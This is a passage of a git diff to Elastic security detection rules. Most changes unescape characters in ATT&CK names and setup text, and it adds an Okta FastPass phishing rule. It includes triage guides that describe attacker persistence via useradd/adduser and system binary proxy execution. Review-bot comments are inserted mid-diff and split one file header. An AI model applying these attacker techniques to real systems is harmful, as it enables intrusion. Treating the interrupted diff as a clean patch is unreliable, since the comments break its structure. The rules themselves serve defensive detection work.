on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json index 23192a78b58..e4d3903c95d 100644 --- a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json index 68102128c6f..64c2b699227 100644 --- a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json 
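Review bot: In the new edf8ee23-5ea7-4123-ba19-56b41e424ae3_109.json, `tags` carries both `"Tactic: Defense Evasion"` and `"Tactic: Execution"`, but the `threat` array maps only TA0005 (Defense Evasion, T1218), so the Execution tag has no ATT&CK entry behind it and tag-based filtering in Kibana will disagree with the rule's threat mapping. Either add a second `threat` element for TA0002 Execution with the technique the rule is meant to cover, or drop the `"Tactic: Execution"` tag so the two stay in sync. A smaller consistency point in `query`: `process.pe.original_file_name == "wuauclt.exe"` is a case-sensitive comparison while the neighbouring `process.name : "wuauclt.exe"` is case-insensitive; presumably the PE OriginalFilename casing matches, but using `:` for both would remove the dependency on that assumption.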
+++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"user\" and event.type == \"creation\") and\nprocess.name in (\"useradd\", \"adduser\") and user.name != null\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json
index a8e8ab287bc..e1ee4ca295b 100644
--- a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"user\" and event.type == \"creation\") and\nprocess.name in (\"useradd\", \"adduser\") and user.name != null\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103.json b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103.json
new file mode 100644
index 00000000000..5a2b7b663e8
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103.json
@@ -0,0 +1,87 @@
+{
+ "attributes": {
+ "author": [
+ "Austin Songer"
+ ],
+ "description": "Detects when Okta FastPass prevents a user from authenticating to a phishing website.",
+ "index": [
+ "filebeat-*",
+ "logs-okta*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Okta FastPass Phishing Detection",
+ "note": "",
+ "query": "event.dataset:okta.system and event.category:authentication and\n okta.event_type:user.authentication.auth_via_mfa and event.outcome:failure and okta.outcome.reason:\"FastPass declined phishing attempt\"\n",
+ "references": [
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://sec.okta.com/fastpassphishingdetection",
+ "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"
+ ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "^2.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.event_type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.outcome.reason",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nThis rule requires Okta to have the following turned on:\n\nOkta Identity Engine - select 'Phishing Resistance for FastPass' under Settings > Features in the Admin Console.",
+ "severity": "medium",
+ "tags": [
+ "Tactic: Initial Access",
+ "Use Case: Identity and Access Audit",
+ "Data Source: Okta"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1566",
+ "name": "Phishing",
+ "reference": "https://attack.mitre.org/techniques/T1566/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 103
+ },
+ "id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json
index d8956775d17..73d7caf5038 100644
--- a/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e",
- "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nThis rule requires Okta to have the following turned on:\n\nOkta Identity Engine - select 'Phishing Resistance for FastPass' under Settings \u003e Features in the Admin Console.",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nThis rule requires Okta to have the following turned on:\n\nOkta Identity Engine - select 'Phishing Resistance for FastPass' under Settings > Features in the Admin Console.",
 "severity": "medium",
 "tags": [
 "Tactic: Initial Access",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
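Review bot: The new rule version ships with `"note": ""`, so analysts get no triage guidance at all, while sibling rules in this same package (for example the Linux User Account Creation versions earlier in this diff) carry a full "Triage and analysis" section. The query also keys on the exact vendor string `okta.outcome.reason:"FastPass declined phishing attempt"`, so a wording change on Okta's side would make the rule go silent rather than fail; that dependence is worth stating in `setup` or `note` so operators know to re-validate the match after Okta updates. A short investigation guide could cover confirming the `okta.outcome.reason` value on the event, identifying the affected user and client context, checking whether the same user later authenticated successfully by another factor, and noting that this event records a blocked attempt, so follow-up is about scoping the phishing campaign rather than containing a compromised account.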
diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json
index 91b171baee0..4044e8ca98a 100644
--- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json
@@ -70,7 +70,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json
index 91e59c5d6a0..4490de9e4de 100644
--- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json
@@ -70,7 +70,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json
index 2b5848161f8..435c4e1de22 100644
--- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json
@@ -70,7 +70,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json
index ea4ddfe1207..72c281494dc 100644
--- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json
@@ -69,7 +69,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json b/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json
index 9091806674b..e07aa85114a 100644
--- a/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json
index 828f922cfe7..09176daf9fa 100644
--- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json
index 316fd5d3bbe..40990797ee3 100644
--- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json
index 00fe4b417b0..396a1d44c33 100644
--- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
